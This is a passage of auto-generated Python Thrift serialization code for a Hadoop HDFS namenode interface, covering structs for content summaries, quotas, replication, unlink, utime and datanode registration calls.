oprot.writeStructBegin('stat_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getContentSummary_args(object):
"""
Attributes:
- ctx
- Path
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'Path', None, None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, Path=None,):
self.ctx = ctx
self.Path = Path
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.Path = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getContentSummary_args')
if self.Path is not None:
oprot.writeFieldBegin('Path', TType.STRING, 1)
oprot.writeString(self.Path)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getContentSummary_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ContentSummary, ContentSummary.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ContentSummary()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getContentSummary_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class multiGetContentSummary_args(object):
"""
Attributes:
- ctx
- paths
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'paths', (TType.STRING,None), None, ), # 1
None, # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, paths=None,):
self.ctx = ctx
self.paths = paths
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.LIST:
self.paths = []
(_etype38, _size35) = iprot.readListBegin()
for _i39 in xrange(_size35):
_elem40 = iprot.readString();
self.paths.append(_elem40)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('multiGetContentSummary_args')
if self.paths is not None:
oprot.writeFieldBegin('paths', TType.LIST, 1)
oprot.writeListBegin(TType.STRING, len(self.paths))
for iter41 in self.paths:
oprot.writeString(iter41)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class multiGetContentSummary_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(ContentSummary, ContentSummary.thrift_spec)), None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype45, _size42) = iprot.readListBegin()
for _i46 in xrange(_size42):
_elem47 = ContentSummary()
_elem47.read(iprot)
self.success.append(_elem47)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('multiGetContentSummary_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRUCT, len(self.success))
for iter48 in self.success:
iter48.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class setQuota_args(object):
"""
Attributes:
- ctx
- path: Path of the directory.
- namespaceQuota: Limit on the number of names in the directory.
- diskspaceQuota: Limit on disk space occupied by all the files in the
directory.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.I64, 'namespaceQuota', None, None, ), # 2
(3, TType.I64, 'diskspaceQuota', None, None, ), # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, namespaceQuota=None, diskspaceQuota=None,):
self.ctx = ctx
self.path = path
self.namespaceQuota = namespaceQuota
self.diskspaceQuota = diskspaceQuota
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.namespaceQuota = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.diskspaceQuota = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setQuota_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.namespaceQuota is not None:
oprot.writeFieldBegin('namespaceQuota', TType.I64, 2)
oprot.writeI64(self.namespaceQuota)
oprot.writeFieldEnd()
if self.diskspaceQuota is not None:
oprot.writeFieldBegin('diskspaceQuota', TType.I64, 3)
oprot.writeI64(self.diskspaceQuota)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class setQuota_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setQuota_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class setReplication_args(object):
"""
Attributes:
- ctx
- path: Path of the file.
- replication: New replication factor.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.I16, 'replication', None, None, ), # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, replication=None,):
self.ctx = ctx
self.path = path
self.replication = replication
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I16:
self.replication = iprot.readI16();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setReplication_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.replication is not None:
oprot.writeFieldBegin('replication', TType.I16, 2)
oprot.writeI16(self.replication)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class setReplication_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('setReplication_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class unlink_args(object):
"""
Attributes:
- ctx
- path: Path of the file or directory.
- recursive: Delete a non-empty directory recursively.
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.BOOL, 'recursive', None, None, ), # 2
None, # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, recursive=None,):
self.ctx = ctx
self.path = path
self.recursive = recursive
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.BOOL:
self.recursive = iprot.readBool();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('unlink_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.recursive is not None:
oprot.writeFieldBegin('recursive', TType.BOOL, 2)
oprot.writeBool(self.recursive)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class unlink_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('unlink_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class utime_args(object):
"""
Attributes:
- ctx
- path: Path of the file or directory.
- atime: Access time in milliseconds since 1970-01-01 00:00 UTC
- mtime: Modification time in milliseconds since 1970-01-01 00:00 UTC
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'path', None, None, ), # 1
(2, TType.I64, 'atime', None, None, ), # 2
(3, TType.I64, 'mtime', None, None, ), # 3
None, # 4
None, # 5
None, # 6
None, # 7
None, # 8
None, # 9
(10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
)
def __init__(self, ctx=None, path=None, atime=None, mtime=None,):
self.ctx = ctx
self.path = path
self.atime = atime
self.mtime = mtime
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 10:
if ftype == TType.STRUCT:
self.ctx = hadoop.api.common.ttypes.RequestContext()
self.ctx.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRING:
self.path = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.atime = iprot.readI64();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.mtime = iprot.readI64();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('utime_args')
if self.path is not None:
oprot.writeFieldBegin('path', TType.STRING, 1)
oprot.writeString(self.path)
oprot.writeFieldEnd()
if self.atime is not None:
oprot.writeFieldBegin('atime', TType.I64, 2)
oprot.writeI64(self.atime)
oprot.writeFieldEnd()
if self.mtime is not None:
oprot.writeFieldBegin('mtime', TType.I64, 3)
oprot.writeI64(self.mtime)
oprot.writeFieldEnd()
if self.ctx is not None:
oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
self.ctx.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class utime_result(object):
"""
Attributes:
- err
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
)
def __init__(self, err=None,):
self.err = err
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.err = hadoop.api.common.ttypes.IOException()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('utime_result')
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class datanodeUp_args(object):
"""
Attributes:
- name: <host name>:<port number> of the datanode
- storage: the storage id of the datanode
- thriftPort: Thrift port of the datanode
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRING, 'storage', None, None, ), # 2
(3, TType.I32, 'thriftPort', None, None, ), # 3
)
def __init__(self, name=None, storage=None, thriftPort=None,):
self.name = name
self.storage = storage
self.thriftPort = thriftPort
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.storage = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.thriftPort = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('datanodeUp_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.storage is not None:
oprot.writeFieldBegin('storage', TType.STRING, 2)
oprot.writeString(self.storage)
oprot.writeFieldEnd()
if self.thriftPort is not None:
oprot.writeFieldBegin('thriftPort', TType.I32, 3)
oprot.writeI32(self.thriftPort)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class datanodeUp_result(object):
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('datanodeUp_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class datanodeDown_args(object):
"""
Attributes:
- name: <host name>:<port number> of the datanode
- storage: the storage id of the datanode
- thriftPort: Thrift port of the datanode
"""
